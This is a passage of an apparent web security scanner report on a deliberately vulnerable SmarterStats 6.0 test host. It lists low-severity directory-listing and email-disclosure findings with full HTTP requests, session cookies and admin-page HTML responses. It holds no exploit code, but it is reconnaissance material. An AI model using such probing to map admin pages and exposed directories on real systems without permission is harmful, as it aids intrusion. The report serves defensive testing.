Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:23:55 GMT
Content-Length: 1464
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /UserControls/Popups/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /UserControls/Popups/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/UserControls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,069 <A href="frmEventGroup.aspx">frmEventGroup.aspx</A>
Thursday, October 07, 2010 01:00 PM 1,630 <A href="frmHelp.aspx">frmHelp.aspx</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.72. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /aspnet_client/

Request

GET /aspnet_client/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/frmSiteFileBrowser.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:55 GMT
Content-Length: 1337
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /aspnet_client/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /aspnet_client/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/">[To Parent Directory]</A>

Wednesday, October 06, 2010 03:02 AM &lt;dir&gt; <A href="system_web/">system_web</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.73. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /aspnet_client/system_web/

Request

GET /aspnet_client/system_web/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:57 GMT
Content-Length: 1371
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /aspnet_client/system_web/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /aspnet_client/system_web/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/aspnet_client/">[To Parent Directory]</A>

Wednesday, October 06, 2010 03:02 AM &lt;dir&gt; <A href="4_0_30319/">4_0_30319</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

9. Email addresses disclosed
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


9.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmEmailReportSettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Admin/frmEmailReportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:24 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8426



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Email Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmEmailReportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnTest',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Email Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnTest" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnTest',''); return false;"><span class="BBInner">Test Connection</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel1">
   
           <table class="SettingsContainer SCMarginTop" border="0">
       <tr id="ctl00_MPH_txtFromAddress">
           <td id="ctl00_MPH_txtFromAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtFromAddress_Setting" class="Setting"><input name="ctl00$MPH$txtFromAddress_SettingText" type="text" value="someone@yourdomain.com" size="40" id="ctl00_MPH_txtFromAddress_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtSMTPServer">
           <td id="ctl00_MPH_txtSMTPServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSMTPServer_Setting" class="Setting"><input name="ctl00$MPH$txtSMTPServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSMTPServer_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_chkSMTPAuthentication">
           <td id="ctl00_MPH_chkSMTPAuthentication_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSMTPAuthentication_Setting" class="Setting"><input id="ctl00_MPH_chkSMTPAuthentication_SettingCheck" type="checkbox" name="ctl00$MPH$chkSMTPAuthentication_SettingCheck" /><label for="ctl00_MPH_chkSMTPAuthentication_SettingCheck">Enable SMTP authentication</label></td>
       </tr><tr id="ctl00_MPH_txtAuthUsername">
           <td id="ctl00_MPH_txtAuthUsername_Label" class="Indent Fixed">Auth Username</td><td id="ctl00_MPH_txtAuthUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAuthUsername_SettingText" type="text" id="ctl00_MPH_txtAuthUsername_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtAuthPassword">
           <td id="ctl00_MPH_txtAuthPassword_Label" class="Indent Fixed">Auth Password</td><td id="ctl00_MPH_txtAuthPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAuthPassword_SettingText" type="password" id="ctl00_MPH_txtAuthPassword_SettingText" class="text" autocomplete="off" /></td>
       </tr>
   </table>
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmemailreportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmEmailReportSettings\x2easpx?'); });
$('#ctl00_MPH_txtAuthPassword_SettingText').val('');
$(function() { SetTopTitle('Email\x20Settings'); });
modules['vmNotBlank_txt']='Must have a value';
modules['vmEmail_txt']='Must be an email address';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtFromAddress_SettingText","VMs":["vmNotBlank","vmEmail"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSMTPServer_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Auth Username","vcID":"ctl00_MPH_txtAuthUsername_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"Auth Password","vcID":"ctl00_MPH_txtAuthPassword_SettingText","VMs":["vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


9.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmGeneralSettings.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Admin/frmGeneralSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminSettings"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:31 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 20864



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   General Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmGeneralSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       General Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           

<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Web Settings</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>System Administrator</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Administrative Emails</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem3" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel1">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_WebSettingsTab" />

<div id='ctl00_MPH_WebSettingsTab' class='' >
           <span id="ctl00_MPH_WebSettingsTab">
<table id="ctl00_MPH_Table1" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstRows">
                   <td id="ctl00_MPH_lstRows_Label" class="Indent Fixed">Rows per Page</td><td id="ctl00_MPH_lstRows_Setting" class="Setting"><select name="ctl00$MPH$lstRows_SettingDropDown" id="ctl00_MPH_lstRows_SettingDropDown">
                       <option value="10">10</option>
                       <option selected="selected" value="25">25</option>
                       <option value="100">100</option>
                       <option value="500">500</option>
                       <option value="1000">1000</option>
                       <option value="0">All</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstSkins">
                   <td id="ctl00_MPH_lstSkins_Label" class="Indent Fixed">Default Skin</td><td id="ctl00_MPH_lstSkins_Setting" class="Setting"><select name="ctl00$MPH$lstSkins_SettingDropDown" id="ctl00_MPH_lstSkins_SettingDropDown">
                       <option value="Default">Default</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkEnable">
                   <td id="ctl00_MPH_chkEnable_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnable_Setting" class="Setting"><input id="ctl00_MPH_chkEnable_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnable_SettingCheck" /><label for="ctl00_MPH_chkEnable_SettingCheck">Enable users to override skin</label></td>
               </tr><tr id="ctl00_MPH_chkEnableAutoReminderPopups">
                   <td id="ctl00_MPH_chkEnableAutoReminderPopups_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnableAutoReminderPopups_Setting" class="Setting"><input id="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnableAutoReminderPopups_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck">Enable automatic reminder popups</label></td>
               </tr><tr id="ctl00_MPH_chkResetGettingStarted">
                   <td id="ctl00_MPH_chkResetGettingStarted_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkResetGettingStarted_Setting" class="Setting"><input id="ctl00_MPH_chkResetGettingStarted_SettingCheck" type="checkbox" name="ctl00$MPH$chkResetGettingStarted_SettingCheck" /><label for="ctl00_MPH_chkResetGettingStarted_SettingCheck">Reset getting started</label></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministratorTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministratorTab">
<table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lblSiteID">
                   <td id="ctl00_MPH_lblSiteID_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_lblSiteID_Setting" class="Setting"><span id="ctl00_MPH_lblSiteID_ReadOnlyLabel">admin</span></td>
               </tr><tr id="ctl00_MPH_txtAdminUsername">
                   <td id="ctl00_MPH_txtAdminUsername_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtAdminUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAdminUsername_SettingText" type="text" value="admin" id="ctl00_MPH_txtAdminUsername_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtAdminOldPassword">
                   <td id="ctl00_MPH_txtAdminOldPassword_Label" class="Indent Fixed">Old Password</td><td id="ctl00_MPH_txtAdminOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminOldPassword_SettingText" type="password" id="ctl00_MPH_txtAdminOldPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminNewPassword">
                   <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">New Password </td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminConfirmPassword">
                   <td id="ctl00_MPH_txtAdminConfirmPassword_Label" class="Indent Fixed">Confirm New Password </td><td id="ctl00_MPH_txtAdminConfirmPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminConfirmPassword_SettingText" type="password" id="ctl00_MPH_txtAdminConfirmPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministrativeEmailsTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministrativeEmailsTab">
<table id="ctl00_MPH_tblAdministraativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtProblemsEmailAddress">
                   <td id="ctl00_MPH_txtProblemsEmailAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtProblemsEmailAddress_Setting" class="Setting"><input name="ctl00$MPH$txtProblemsEmailAddress_SettingText" type="text" value="administrator@example.com" size="40" id="ctl00_MPH_txtProblemsEmailAddress_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtSmtpServer">
                   <td id="ctl00_MPH_txtSmtpServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSmtpServer_Setting" class="Setting"><input name="ctl00$MPH$txtSmtpServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSmtpServer_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_chkProblemEmailsEnabled">
                   <td id="ctl00_MPH_chkProblemEmailsEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkProblemEmailsEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkProblemEmailsEnabled_SettingCheck" /><label for="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck">Enable email notifications</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmgeneralsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

<script type="text/javascript">
function refresh() {
parent.document.location.reload(true);
}
</script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmGeneralSettings\x2easpx?'); });
$('#ctl00_MPH_txtAdminOldPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminConfirmPassword_SettingText').val('');
$(function() { SetTopTitle('General\x20Settings'); });
